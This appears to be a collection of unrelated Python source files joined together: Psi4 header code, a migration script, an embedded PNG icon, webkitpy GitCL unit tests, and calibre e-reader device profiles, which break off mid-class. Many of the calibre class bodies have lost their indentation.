                                                 'persistency', 'readout', 'Tree', 'VRML')]
    custom_paths = {
        'files': wrappers + libs,
        'dirs': ['include/Geant4'],
    }
    super(EB_Geant4, self).sanity_check_step(custom_paths)
|
import datetime
import os
from . import core
from .metadata import __version__, version_formatter
# Timestamp (local time) and process id captured once at import time;
# both are interpolated into the output header by print_header().
time_string = datetime.datetime.now().strftime('%A, %d %B %Y %I:%M%p')
pid = os.getpid()
def sizeof_fmt(num, suffix='B'):
    """Render *num* as a human-readable size using binary (1024-based) prefixes,
    e.g. ``sizeof_fmt(1536)`` -> ``'1.5 KiB'``."""
    value = num
    for prefix in ('', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi'):
        if abs(value) < 1024.0:
            return "%3.1f %s%s" % (value, prefix, suffix)
        value /= 1024.0
    # anything that survives all divisions is in the yobi range
    return "%.1f %s%s" % (value, 'Yi', suffix)
def print_header():
    """Print the Psi4 banner (version, git revision, citation, start time,
    process id, data dir, memory and thread count) to the output stream."""
    driver_info = version_formatter("""{version} {release}""")
    git_info = version_formatter("""{{{branch}}} {githash} {clean}""")
    datadir = core.get_environment("PSIDATADIR")
    # memory limit reported by the core module, rendered human-readable
    memory = sizeof_fmt(core.get_memory())
    threads = str(core.get_num_threads())
    header = """
-----------------------------------------------------------------------
Psi4: An Open-Source Ab Initio Electronic Structure Package
Psi4 %s
Git: Rev %s
R. M. Parrish, L. A. Burns, D. G. A. Smith, A. C. Simmonett,
A. E. DePrince III, E. G. Hohenstein, U. Bozkaya, A. Yu. Sokolov,
R. Di Remigio, R. M. Richard, J. F. Gonthier, A. M. James,
H. R. McAlexander, A. Kumar, M. Saitow, X. Wang, B. P. Pritchard,
P. Verma, H. F. Schaefer III, K. Patkowski, R. A. King, E. F. Valeev,
F. A. Evangelista, J. M. Turney, T. D. Crawford, and C. D. Sherrill,
submitted.
-----------------------------------------------------------------------
Psi4 started on: %s
Process ID: %6d
PSIDATADIR: %s
Memory: %s
Threads: %s
""" % (driver_info, git_info, time_string, pid, datadir, memory, threads)
    core.print_out(header)
|
from migrate.versioning.shell import main

# Standard sqlalchemy-migrate management script: hands control to the
# `migrate` CLI with this directory as the migration repository.
# NOTE: debug='False' (a string) is the upstream template's convention.
if __name__ == '__main__':
    main(debug='False', repository='.')
|
# Base64-encoded PNG icon data, embedded as a single bytes literal built from
# implicitly-concatenated chunks (48x48 judging by the IHDR header -- verify
# before relying on the exact dimensions).
icon_outputs = b'iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAYAAABXAvmHAAAA'\
b'BHNCSVQICAgIfAhkiAAAAAlwSFlzAAAN1wAADdcBQiibeAAA'\
b'CuNJREFUaIHVmltsXcd1hr+Z2ftceZVoi4xFS6KdSlHkooGr'\
b'JgpyqWQEKFwkqNvaemrhINVDCxfpS4HW7YP8UD+5ShEbiuJL'\
b'0LhGW0Bx/ZDGdYwiiA2bVS624jqOqBspUbLEm07Ec9vXWdOH'\
b'fXgkUhR5KJkPXcAAm+SamfXPWutfa8+mYhX57ksvTez6xCe2'\
b'Gt+jq9xFIZ/H8zy01hhjaDabvPXWW+zbtw+tNSJCkqaEYUi9'\
b'XqNarXH6zJnxr331q/esttetiLeawq9/Xdm6cWCAOI4xxuD5'\
b'PlopcrkcuVyORqPB5OQk5XIZAGstJk1J0pT5apVfnTjBlUpl'\
b'ZD2MB9CrKVQqFcbPnmViYoKJ8XFOjo1Rq9dwOABEhCNHjuCc'\
b'wzmHOIdYi01T0tQizq2X7UAHHujt7WPrtq3EcUIulyNJEur1'\
b'Ohs2bGjr+L7fflaLZq+v8dCBB8QJIq59ws4JWpsV5zho6QLr'\
b'7IHVAYi0jadlj9aLp8Ub77zJbNcGs16yaghdO/lrQ6nFgdLY'\
b'vuvGedz88Dc9dPjOgip+1hil6mEyOvP9A9O3ZD1r9MDCWOoB'\
b'EzSvGe5cZnkWPzekweaH/7FYcubAx4e7vrNrpP/ZjWX9xJav'\
b'HP7UrQLoyAPipM06ywHo/uDdZec5R3vegjRrVb/buG0Pfu7+'\
b'/vs+OcybPzn7tXd/OXkfX/7mM82q/v7sG4/V1wKgcw9cl8h6'\
b'SQipOF5s/DJPbamADatGa0H5Pl/Y8xveV76067MPfGbLoTs3'\
b'qX/Y/OVn7l0LgM5yQDJ+X0hGpZfH7ZY8L0TRIh17WdmwbIKg'\
b'SdAMERyDg/383t5dg73dxT8/fmJqq/8Hh5+bODX9Or96YvHJ'\
b'3CqABS8sWLM0hNpAr/2wSH+ppFFVh0FAEEbXwkwrfvu3tvob'\
b'+sq//4ux6W3lrq6R2e0v/vv0K386s5J9q4YQLITRNRBLWQgg'\
b'jmNmpqex1q5YviSdVjap6yAICIKYMIwIg5gwiEmsZXhzv/ni'\
b'79x936fv23Tw7g25x0ceevFGirtOVvUAgBW7mFiW4UfnHKVy'\
b'mUYQ8/LrP+fyzDzVepWr81XCIOTjD3z9nyQNsHGUS+Lg/iiK'\
b'iOKk7SSHa4ern/P4ze0b+3tK3l+cmLj6KW//dw+dmr/jNV57'\
b'MLolACLSYsQWE4ncoFMoFMgXCpw4fZE33znN5uEhujYOUto4'\
b'hHOOLTvk6yIWsYITy+DQx4jj9DoAZF4WyfJNhM2DJd/3+EJ3'\
b'ybvLG6/srj78z9+6ePTRD9cMwFqL1jpjIlixQXNOEBHK3SVy'\
b'+QKe52N8D6M9jDEordFaoxQkseAU7ZxZaFXEZmuICN1lzY4t'\
b'pRHl7F9fqoTbcg9/54XxmfNv8sYTaecesAKoRR3oTQHgCMOI'\
b'ZjPCYRAB48AYhRHQBrQGpTQKAbVQ96RF1RkAay1WLNam2NSq'\
b'uwf9XLngHskpu924Lc8FDz939OLRA5UOc0BQWrcZQ8TeXNlB'\
b'GEU0myFK+4hoPDF4vuCcRjvXAtAiA7cQ/7RaccnacWtJbYqz'\
b'ljRNiOMIlTY9L67c74Jwq9HFe+7+wxeOdJwDGQvJTZM4Mz7L'\
b'8jAIqTdCtJfH4eGU4LQDBaalpvS1Oe33CHHYNDv9KIwJg4hm'\
b'EFCvN5ifrzJ35SqNep1mEG4UU/5Lv2dwW8c5YDzTrk4rhpA4'\
b'qtUa5yen2TAg9PQIpbIjX4BcDjzPobXAwuk7hxUhTYU0scRJ'\
b'QhjGBEFAFEUEzWb2HAYkqSAOcAKS+qRxV8cAsgR2CCsDAAjD'\
b'iLkrNVKXJ4g05QCKJSgUHJ5n8VrJrFSWV04yEGItSSokFsRp'\
b'HAqlNcYsJL4CpZ3yyxXtd79skc5CKKsDGbWtFEJZNXY4ScG5'\
b'bHPPYHwfz/fxPB/f9/A80zZoodIbEVKlsjwTh/UM2hq0NqhW'\
b'vCXWprFVp1LtH7GR/t7cf//t5VUB2DQliWNMuYtavYHYlOHh'\
b'YbTSy7YUOEFsgnVZomtt8IyH7xn8nEfO9zMAKgOw8Ma3UMFF'\
b'BCuZ4ZmOxlpLtVazjUbzB5G13557+9LrcNRCBzRqPA9rhTAM'\
b'6evrpau7m2Kx2ObpZRCglKVZvcK8Udi4SbN2hUI+R84zeEZj'\
b'jOKurdvp7t3QMljQrdMXIxgrmNbhNOpVNzN96VK1Ov9vYZR8'\
b'u3r8hTPX79ZRCDmxxHGMtNy7kgxs7OOhL32Gk2cnCaKAMJwn'\
b'asR8cH72ZSQFiY3YZPeDf3zgrg0DmxARtLXgwEhmuNaKNI25'\
b'NDkuM1Mf/rRarT1zdebKK1z+z+bS/TqjUSBXyEO7obv5fcPG'\
b'vh7+6sAfMTc3x8S5CSYvXKDeaHDwh//yCADdO/pzxdxhrfUj'\
b'uZyPtRalaAFROKAyN8X5MyevXLgw8UoQREeaY0ePt8y4QTpm'\
b'IVo8LU5WvGhY9M6gVLt1aBug8xatref75Hy/lbgOrS1pEnP+'\
b'zPv2zNj747NTlw/HNj0anP7BhzffbQ0AFqrwzUJobm4u43Rr'\
b'aTab1Gs1mvUGjUY22qI9h3LWmIyNRASlFLX5Cu+/M5qc+OXP'\
b'X6vNX30+OCevwhvparZ1XInlul5lORkYGEBECIKAsZMn6evv'\
b'p1AsUCwWl6Nd8TyDMQZrA86OvefePfbjS+fGT/5rHNSejy/9'\
b'7FQndnUMIEnSa53iKuHz7LPPEscxs3NzfHHv797IVMo4EAmC'\
b'kLmZKX729o/kg/eO/c/Uh+e/lVyeeRnOh50a3zGA1KaL7j2d'\
b'ZP1KmqakNuP7NE2xIpRKJQC6u7qWL3jKc07Z+uiPf+h++vaP'\
b'Khcnz7waBbVvplPHjwMrdIm3AUCsJQpCnHOEYciFC5MMbhpk'\
b'5J57SJOE4TBsg9m/fz8nxsbIFwpcuDB5I4gro00Z/PSrk+On'\
b'Upz93yRJXqfy3oqJelsAlFIkSUI+n0dpTblUZnjzMIVCnjiO'\
b'SZKETzYaxEnS/jYwODREpVJBxKFQSyu2tVM/+S8Lr/ER3P6u'\
b'CkBrTZIkWLFEQZNCvkAcx1kz6bLQaXz+88RRlHWVSUIUhsRx'\
b'jBWL0mrZS4CPwviOABitCaOYixcv0tvXl3WMSYzWClD09vXx'\
b'99/4RhZCaUocx9nXmUaDOIpxIhiz8m32egLIO+emjVabrAjO'\
b'SqtHD7CpxZgI43nQ4v+09WUmCAKSNMXh8DyfJI6m1gvAsr5d'\
b'It3Xja7WKG3btu1ze/bsedzzPAYGBjh27Njp0dHRvwFCoNEa'\
b'daAK1FrjI5dOWGjZzffs2SN79+59vFAoMDIyQpIkU6Ojo//x'\
b'0Zu4snREo8tJsVhM+/v7KRQK3HHHHRSLxVXL/nrILQPwfd/2'\
b'9/dTLBYZGBigXC7//wJQLpfT/v5+fN+nVCqhtV7/L3rLSCdJ'\
b'zKFDh+5VSr0D9LR/qX2czoPOgUvBRigXL/quNDQ0dG7//v0j'\
b'Sql1A6ceffTRP/F9/2MrKe3cufPeffv2/dlaF+/q6uKpp576'\
b'uzRNl+1xlFJqYGDg4pNPPvnSWtdur3H8+PFzpVJpy0pK1Wr1'\
b'lhbv6elZVadarZ7cvXv3jlvagA5ywFpLvV6nXl/Tpysge4/o'\
b'6+tbVed2xBsaGmr/n8NSSZKEq1ev4nkeU1NrL6b5fJ4dO3Ys'\
b'f/3SEpFVbglWEe/w4cMv5nK5TUv/EEWRFwRBDkBrPdTd3f3A'\
b'Whfv7e3l6aeffp6bvJC31r6tNqMjFnrsscd2OOd+AeTXsvjO'\
b'nTtnZ2dnBw8ePHh7cbKC/B8rHMqx5Ahr7gAAAABJRU5ErkJg'\
b'gg=='
|
import unittest
from webkitpy.common.net.git_cl import GitCL
from webkitpy.common.system.executive_mock import MockExecutive2
from webkitpy.common.host_mock import MockHost
class GitCLTest(unittest.TestCase):
    """Tests for the GitCL wrapper around the `git cl` command-line tool."""

    @staticmethod
    def _make_host(output=''):
        # Host whose executive records the commands it runs and
        # returns the given canned output.
        host = MockHost()
        host.executive = MockExecutive2(output=output)
        return host

    @staticmethod
    def _job(status, result):
        # A single try-job result dict as returned by the try bots.
        return {
            'builder_name': 'some-builder',
            'status': status,
            'result': result,
        }

    def test_run(self):
        host = self._make_host(output='mock-output')
        result = GitCL(host).run(['command'])
        self.assertEqual(result, 'mock-output')
        self.assertEqual(host.executive.calls, [['git', 'cl', 'command']])

    def test_run_with_auth(self):
        host = self._make_host(output='mock-output')
        GitCL(host, auth_refresh_token_json='token.json').run(['upload'])
        self.assertEqual(
            host.executive.calls,
            [['git', 'cl', 'upload', '--auth-refresh-token-json', 'token.json']])

    def test_some_commands_not_run_with_auth(self):
        host = self._make_host(output='mock-output')
        GitCL(host, auth_refresh_token_json='token.json').run(['issue'])
        self.assertEqual(host.executive.calls, [['git', 'cl', 'issue']])

    def test_get_issue_number(self):
        host = self._make_host(output='Issue number: 12345 (http://crrev.com/12345)')
        self.assertEqual(GitCL(host).get_issue_number(), '12345')

    def test_get_issue_number_none(self):
        host = self._make_host(output='Issue number: None (None)')
        self.assertEqual(GitCL(host).get_issue_number(), 'None')

    def test_all_jobs_finished_empty(self):
        self.assertTrue(GitCL.all_jobs_finished([]))

    def test_all_jobs_finished_with_started_jobs(self):
        jobs = [
            self._job('COMPLETED', 'FAILURE'),
            self._job('STARTED', None),
        ]
        self.assertFalse(GitCL.all_jobs_finished(jobs))

    def test_all_jobs_finished_only_completed_jobs(self):
        jobs = [
            self._job('COMPLETED', 'FAILURE'),
            self._job('COMPLETED', 'SUCCESS'),
        ]
        self.assertTrue(GitCL.all_jobs_finished(jobs))

    def test_has_failing_try_results_empty(self):
        self.assertFalse(GitCL.has_failing_try_results([]))

    def test_has_failing_try_results_only_success_and_started(self):
        jobs = [
            self._job('COMPLETED', 'SUCCESS'),
            self._job('STARTED', None),
        ]
        self.assertFalse(GitCL.has_failing_try_results(jobs))

    def test_has_failing_try_results_with_failing_results(self):
        self.assertTrue(GitCL.has_failing_try_results([
            self._job('COMPLETED', 'FAILURE'),
        ]))
|
from __future__ import with_statement
__license__ = 'GPL 3'
__copyright__ = '2009, Kovid Goyal <kovid@kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
from itertools import izip
from calibre.customize import Plugin as _Plugin
# (CSS font-size keyword, numeric size) pairs; Plugin.__init__ zips these with
# the per-device `fsizes` table to attach a point size to each entry. `None`
# marks a keyword/number with no counterpart on the other scale. The 1-7
# numbers look like the legacy HTML font-size scale -- verify before relying
# on that.
FONT_SIZES = [('xx-small', 1),
              ('x-small', None),
              ('small', 2),
              ('medium', 3),
              ('large', 4),
              ('x-large', 5),
              ('xx-large', 6),
              (None, 7)]
class Plugin(_Plugin):
    """Device profile base class: records screen geometry and builds
    font-size lookup tables from FONT_SIZES and the per-device `fsizes`."""

    fbase = 12
    fsizes = [5, 7, 9, 12, 13.5, 17, 20, 22, 24]
    screen_size = (1600, 1200)
    dpi = 100

    def __init__(self, *args, **kwargs):
        _Plugin.__init__(self, *args, **kwargs)
        self.width, self.height = self.screen_size
        raw_sizes = list(self.fsizes)
        self.fkey = list(self.fsizes)
        # (css-name, html-number, point-size) triples
        self.fsizes = [(name, num, float(size))
                       for (name, num), size in izip(FONT_SIZES, raw_sizes)]
        self.fnames = dict((name, sz) for name, _, sz in self.fsizes if name)
        self.fnums = dict((num, sz) for _, num, sz in self.fsizes if num)
        # 72 points per inch
        self.width_pts = self.width * 72. / self.dpi
        self.height_pts = self.height * 72. / self.dpi
class InputProfile(Plugin):
    """Default/fallback input profile; device-specific input profiles
    subclass this and override the class attributes."""
    author = 'Kovid Goyal'
    supported_platforms = set(['windows', 'osx', 'linux'])
    can_be_disabled = False
    type = _('Input profile')
    name = 'Default Input Profile'
    short_name = 'default'  # Used in the CLI so dont use spaces etc. in it
    description = _('This profile tries to provide sane defaults and is useful '
                    'if you know nothing about the input document.')
class SonyReaderInput(InputProfile):
name = 'Sony Reader'
short_name = 'sony'
description = _('This profile is intended for the SONY PRS line. '
'The 500/505/600/700 etc.')
screen_size = (584, 754)
dpi = 168.451
fbase = 12
fsizes = [7.5, 9, 10, 12, 15.5, 20, 22, 24]
class SonyReader300Input(SonyReaderInput):
name = 'Sony Reader 300'
short_name = 'sony300'
description = _('This profile is intended for the SONY PRS 300.')
dpi = 200
class SonyReader900Input(SonyReaderInput):
author = 'John Schember'
name = 'Sony Reader 900'
short_name = 'sony900'
description = _('This profile is intended for the SONY PRS-900.')
screen_size = (584, 978)
class MSReaderInput(InputProfile):
name = 'Microsoft Reader'
short_name = 'msreader'
description = _('This profile is intended for the Microsoft Reader.')
screen_size = (480, 652)
dpi = 96
fbase = 13
fsizes = [10, 11, 13, 16, 18, 20, 22, 26]
class MobipocketInput(InputProfile):
name = 'Mobipocket Books'
short_name = 'mobipocket'
description = _('This profile is intended for the Mobipocket books.')
# Unfortunately MOBI books are not narrowly targeted, so this information is
# quite likely to be spurious
screen_size = (600, 800)
dpi = 96
fbase = 18
fsizes = [14, 14, 16, 18, 20, 22, 24, 26]
class HanlinV3Input(InputProfile):
name = 'Hanlin V3'
short_name = 'hanlinv3'
description = _('This profile is intended for the Hanlin V3 and its clones.')
# Screen size is a best guess
screen_size = (584, 754)
dpi = 168.451
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
class HanlinV5Input(HanlinV3Input):
name = 'Hanlin V5'
short_name = 'hanlinv5'
description = _('This profile is intended for the Hanlin V5 and its clones.')
# Screen size is a best guess
screen_size = (584, 754)
dpi = 200
class CybookG3Input(InputProfile):
name = 'Cybook G3'
short_name = 'cybookg3'
description = _('This profile is intended for the Cybook G3.')
# Screen size is a best guess
screen_size = (600, 800)
dpi = 168.451
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
class CybookOpusInput(InputProfile):
author = 'John Schember'
name = 'Cybook Opus'
short_name = 'cybook_opus'
description = _('This profile is intended for the Cybook Opus.')
# Screen size is a best guess
screen_size = (600, 800)
dpi = 200
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
class KindleInput(InputProfile):
name = 'Kindle'
short_name = 'kindle'
description = _('This profile is intended for the Amazon Kindle.')
# Screen size is a best guess
screen_size = (525, 640)
dpi = 168.451
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
class IlliadInput(InputProfile):
name = 'Illiad'
short_name = 'illiad'
description = _('This profile is intended for the Irex Illiad.')
screen_size = (760, 925)
dpi = 160.0
fbase = 12
fsizes = [7.5, 9, 10, 12, 15.5, 20, 22, 24]
class IRexDR1000Input(InputProfile):
author = 'John Schember'
name = 'IRex Digital Reader 1000'
short_name = 'irexdr1000'
description = _('This profile is intended for the IRex Digital Reader 1000.')
# Screen size is a best guess
screen_size = (1024, 1280)
dpi = 160
fbase = 16
fsizes = [12, 14, 16, 18, 20, 22, 24]
class IRexDR800Input(InputProfile):
author = 'Eric Cronin'
name = 'IRex Digital Reader 800'
short_name = 'irexdr800'
description = _('This profile is intended for the IRex Digital Reader 800.')
screen_size = (768, 1024)
dpi = 160
fbase = 16
fsizes = [12, 14, 16, 18, 20, 22, 24]
class NookInput(InputProfile):
author = 'John Schember'
name = 'Nook'
short_name = 'nook'
description = _('This profile is intended for the B&N Nook.')
# Screen size is a best guess
screen_size = (600, 800)
dpi = 167
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
# All available input profiles, sorted case-insensitively by display name.
input_profiles = [InputProfile, SonyReaderInput, SonyReader300Input,
        SonyReader900Input, MSReaderInput, MobipocketInput, HanlinV3Input,
        HanlinV5Input, CybookG3Input, CybookOpusInput, KindleInput, IlliadInput,
        IRexDR1000Input, IRexDR800Input, NookInput]

# key= computes the sort key once per element (cmp= called it per comparison)
# and, unlike cmp=, also works on Python 3.
input_profiles.sort(key=lambda x: x.name.lower())
class OutputProfile(Plugin):
    """Default output profile; device-specific output profiles subclass this
    and override the class attributes below."""
    author = 'Kovid Goyal'
    supported_platforms = set(['windows', 'osx', 'linux'])
    can_be_disabled = False
    type = _('Output profile')
    name = 'Default Output Profile'
    short_name = 'default'  # Used in the CLI so dont use spaces etc. in it
    description = _('This profile tries to provide sane defaults and is useful '
                    'if you want to produce a document intended to be read at a '
                    'computer or on a range of devices.')

    #: The image size for comics
    comic_screen_size = (584, 754)

    #: If True the MOBI renderer on the device supports MOBI indexing
    supports_mobi_indexing = False

    #: If True output should be optimized for a touchscreen interface
    touchscreen = False
    touchscreen_news_css = ''

    #: A list of extra (beyond CSS 2.1) modules supported by the device
    #: Format is a cssutils profile dictionary (see iPad for example)
    extra_css_modules = []

    #: If True, the date is appended to the title of downloaded news
    periodical_date_in_title = True

    #: Characters used in jackets and catalogs
    ratings_char = u'*'
    empty_ratings_char = u' '

    #: Unsupported unicode characters to be replaced during preprocessing
    unsupported_unicode_chars = []

    #: Number of ems that the left margin of a blockquote is rendered as
    mobi_ems_per_blockquote = 1.0

    #: Special periodical formatting needed in EPUB
    epub_periodical_format = None
class iPadOutput(OutputProfile):
name = 'iPad'
short_name = 'ipad'
description = _('Intended for the iPad and similar devices with a '
'resolution of 768x1024')
screen_size = (768, 1024)
comic_screen_size = (768, 1024)
dpi = 132.0
extra_css_modules = [
{
'name':'webkit',
'props': {'-webkit-border-bottom-left-radius':'{length}',
'-webkit-border-bottom-right-radius':'{length}',
'-webkit-border-top-left-radius':'{length}',
'-webkit-border-top-right-radius':'{length}',
'-webkit-border-radius': r'{border-width}(\s+{border-width}){0,3}|inherit',
},
'macros': {'border-width': '{length}|medium|thick|thin'}
}
]
ratings_char = u'\u2605' # filled star
empty_ratings_char = u'\u2606' # hollow star
touchscreen = True
# touchscreen_news_css {{{
touchscreen_news_css = u'''
/* hr used in articles */
.article_articles_list {
width:18%;
}
.article_link {
color: #593f29;
font-style: italic;
}
.article_next {
-webkit-border-top-right-radius:4px;
-webkit-border-bottom-right-radius:4px;
font-style: italic;
width:32%;
}
.article_prev {
-webkit-border-top-left-radius:4px;
-webkit-border-bottom-left-radius:4px;
font-style: italic;
width:32%;
}
.article_sections_list {
width:18%;
}
.articles_link {
font-weight: bold;
}
.sections_link {
font-weight: bold;
}
.caption_divider {
border:#ccc 1px solid;
}
.touchscreen_navbar {
background:#c3bab2;
border:#ccc 0px solid;
border-collapse:separate;
border-spacing:1px;
margin-left: 5%;
margin-right: 5%;
page-break-inside:avoid;
width: 90%;
-webkit-border-radius:4px;
}
.touchscreen_navbar td {
background:#fff;
font-family:Helvetica;
font-size:80%;
/* UI touchboxes use 8px padding */
padding: 6px;
text-align:center;
}
.touchscreen_navbar td a:link {
color: #593f29;
text-decoration: none;
}
/* Index formatting */
.publish_date {
text-align:center;
}
.divider {
border-bottom:1em solid white;
border-top:1px solid gray;
}
hr.caption_divider {
border-color:black;
border-style:solid;
border-width:1px;
}
/* Feed summary formatting */
.article_summary {
display:inline-block;
padding-bottom:0.5em;
}
.feed {
font-family:sans-serif;
font-weight:bold;
font-size:larger;
}
.feed_link {
font-style: italic;
}
.feed_next {
-webkit-border-top-right-radius:4px;
-webkit-border-bottom-right-radius:4px;
font-style: italic;
width:40%;
}
.feed_prev {
-webkit-border-top-left-radius:4px;
-webkit-border-bottom-left-radius:4px;
font-style: italic;
width:40%;
}
.feed_title {
text-align: center;
font-size: 160%;
}
.feed_up {
font-weight: bold;
width:20%;
}
.summary_headline {
font-weight:bold;
text-align:left;
}
.summary_byline {
text-align:left;
font-family:monospace;
}
.summary_text {
text-align:left;
}
'''
# }}}
class iPad3Output(iPadOutput):
screen_size = comic_screen_size = (2048, 1536)
dpi = 264.0
name = 'iPad 3'
short_name = 'ipad3'
description = _('Intended for the iPad 3 and similar devices with a '
'resolution of 1536x2048')
class TabletOutput(iPadOutput):
name = 'Tablet'
short_name = 'tablet'
description = _('Intended for generic tablet devices, does no resizing of images')
screen_size = (10000, 10000)
comic_screen_size = (10000, 10000)
class SamsungGalaxy(TabletOutput):
name = 'Samsung Galaxy'
short_name = 'galaxy'
description = _('Intended for the Samsung Galaxy and similar tablet devices with '
'a resolution of 600x1280')
screen_size = comic_screen_size = (600, 1280)
class NookHD(TabletOutput):
name = 'Nook HD+'
short_name = 'nook_hd_plus'
description = _('Intended for the Nook HD+ and similar tablet devices with '
'a resolution of 1280x1920')
screen_size = comic_screen_size = (1280, 1920)
class SonyReaderOutput(OutputProfile):
name = 'Sony Reader'
short_name = 'sony'
description = _('This profile is intended for the SONY PRS line. '
'The 500/505/600/700 etc.')
screen_size = (590, 775)
dpi = 168.451
fbase = 12
fsizes = [7.5, 9, 10, 12, 15.5, 20, 22, 24]
unsupported_unicode_chars = [u'\u201f', u'\u201b']
epub_periodical_format = 'sony'
# periodical_date_in_title = False
class KoboReaderOutput(OutputProfile):
name = 'Kobo Reader'
short_name = 'kobo'
description = _('This profile is intended for the Kobo Reader.')
screen_size = (536, 710)
comic_screen_size = (536, 710)
dpi = 168.451
fbase = 12
fsizes = [7.5, 9, 10, 12, 15.5, 20, 22, 24]
class SonyReader300Output(SonyReaderOutput):
author = 'John Schember'
name = 'Sony Reader 300'
short_name = 'sony300'
description = _('This profile is intended for the SONY PRS-300.')
dpi = 200
class SonyReader900Output(SonyReaderOutput):
author = 'John Schember'
name = 'Sony Reader 900'
short_name = 'sony900'
description = _('This profile is intended for the SONY PRS-900.')
screen_size = (600, 999)
comic_screen_size = screen_size
class SonyReaderT3Output(SonyReaderOutput):
author = 'Kovid Goyal'
name = 'Sony Reader T3'
short_name = 'sonyt3'
description = _('This profile is intended for the SONY PRS-T3.')
screen_size = (758, 934)
comic_screen_size = screen_size
class GenericEink(SonyReaderOutput):
name = 'Generic e-ink'
short_name = 'generic_eink'
description = _('Suitable for use with any e-ink device')
epub_periodical_format = None
class GenericEinkLarge(GenericEink):
name = 'Generic e-ink large'
short_name = 'generic_eink_large'
description = _('Suitable for use with any large screen e-ink device')
screen_size = (600, 999)
comic_screen_size = screen_size
class GenericEinkHD(GenericEink):
name = 'Generic e-ink HD'
short_name = 'generic_eink_hd'
description = _('Suitable for use with any modern high resolution e-ink device')
screen_size = (10000, 10000)
comic_screen_size = (10000, 10000)
class JetBook5Output(OutputProfile):
name = 'JetBook 5-inch'
short_name = 'jetbook5'
description = _('This profile is intended for the 5-inch JetBook.')
screen_size = (480, 640)
dpi = 168.451
class SonyReaderLandscapeOutput(SonyReaderOutput):
name = 'Sony Reader Landscape'
short_name = 'sony-landscape'
description = _('This profile is intended for the SONY PRS line. '
'The 500/505/700 etc, in landscape mode. Mainly useful '
'for comics.')
screen_size = (784, 1012)
comic_screen_size = (784, 1012)
class MSReaderOutput(OutputProfile):
name = 'Microsoft Reader'
short_name = 'msreader'
description = _('This profile is intended for the Microsoft Reader.')
screen_size = (480, 652)
dpi = 96
fbase = 13
fsizes = [10, 11, 13, 16, 18, 20, 22, 26]
class MobipocketOutput(OutputProfile):
name = 'Mobipocket Books'
short_name = 'mobipocket'
description = _('This profile is intended for the Mobipocket books.')
# Unfortunately MOBI books are not narrowly targeted, so this information is
# quite likely to be spurious
screen_size = (600, 800)
dpi = 96
fbase = 18
fsizes = [14, 14, 16, 18, 20, 22, 24, 26]
class HanlinV3Output(OutputProfile):
name = 'Hanlin V3'
short_name = 'hanlinv3'
description = _('This profile is intended for the Hanlin V3 and its clones.')
# Screen size is a best guess
screen_size = (584, 754)
dpi = 168.451
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
class HanlinV5Output(HanlinV3Output):
name = 'Hanlin V5'
short_name = 'hanlinv5'
description = _('This profile is intended for the Hanlin V5 and its clones.')
dpi = 200
class CybookG3Output(OutputProfile):
name = 'Cybook G3'
short_name = 'cybookg3'
description = _('This profile is intended for the Cybook G3.')
# Screen size is a best guess
screen_size = (600, 800)
comic_screen_size = (600, 757)
dpi = 168.451
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
class CybookOpusOutput(SonyReaderOutput):
author = 'John Schember'
name = 'Cybook Opus'
short_name = 'cybook_opus'
description = _('This profile is intended for the Cybook Opus.')
# Screen size is a best guess
dpi = 200
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
epub_periodical_format = None
class KindleOutput(OutputProfile):
name = 'Kindle'
short_name = 'kindle'
description = _('This profile is intended for the Amazon Kindle.')
# Screen size is a best guess
screen_size = (525, 640)
dpi = 168.451
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
supports_mobi_indexing = True
periodical_date_in_title = False
empty_ratings_char = u'\u2606'
ratings_char = u'\u2605'
mobi_ems_per_blockquote = 2.0
class KindleDXOutput(OutputProfile):
name = 'Kindle DX'
short_name = 'kindle_dx'
description = _('This profile is intended for the Amazon Kindle DX.')
# Screen size is a best guess
screen_size = (744, 1022)
dpi = 150.0
comic_screen_size = (771, 1116)
# comic_screen_size = (741, 1022)
supports_mobi_indexing = True
periodical_date_in_title = False
empty_ratings_char = u'\u2606'
ratings_char = u'\u2605'
mobi_ems_per_blockquote = 2.0
class KindlePaperWhiteOutput(KindleOutput):
name = 'Kindle PaperWhite'
short_name = 'kindle_pw'
description = _('This profile is intended for the Amazon Kindle PaperWhite 1 and 2')
# Screen size is a best guess
screen_size = (658, 940)
dpi = 212.0
comic_screen_size = screen_size
class KindleVoyageOutput(KindleOutput):
name = 'Kindle Voyage'
short_name = 'kindle_voyage'
description = _('This profile is intended for the Amazon Kindle Voyage')
# Screen size is currently just the spec size, actual renderable area will
# depend on someone with the device doing tests.
screen_size = (1080, 1430)
dpi = 300.0
comic_screen_size = screen_size
class KindlePaperWhite3Output(KindleVoyageOutput):
name = 'Kindle PaperWhite 3'
short_name = 'kindle_pw3'
description = _('This profile is intended for the Amazon Kindle PaperWhite 3 and above')
# Screen size is currently just the spec size, actual renderable area will
# depend on someone with the device doing tests.
screen_size = (1072, 1430)
dpi = 300.0
comic_screen_size = screen_size
class KindleFireOutput(KindleDXOutput):
name = 'Kindle Fire'
short_name = 'kindle_fire'
description = _('This profile is intended for the Amazon Kindle Fire.')
screen_size = (570, 1016)
dpi = 169.0
comic_screen_size = (570, 1016)
class IlliadOutput(OutputProfile):
name = 'Illiad'
short_name = 'illiad'
description = _('This profile is intended for the Irex Illiad.')
screen_size = (760, 925)
comic_screen_size = (760, 925)
dpi = 160.0
fbase = 12
fsizes = [7.5, 9, 10, 12, 15.5, 20, 22, 24]
class IRexDR1000Output(OutputProfile):
author = 'John Schember'
name = 'IRex Digital Reader 1000'
short_name = 'irexdr1000'
description = _('This profile is intended for the IRex Digital Reader 1000.')
# Screen size is a best guess
screen_size = (1024, 1280)
comic_screen_size = (996, 1241)
dpi = 160
fbase = 16
fsizes = [12, 14, 16, 18, 20, 22, 24]
class IRexDR800Output(OutputProfile):
author = 'Eric Cronin'
name = 'IRex Digital Reader 800'
short_name = 'irexdr800'
description = _('This profile is intended for the IRex Digital Reader 800.')
# Screen size is a best guess
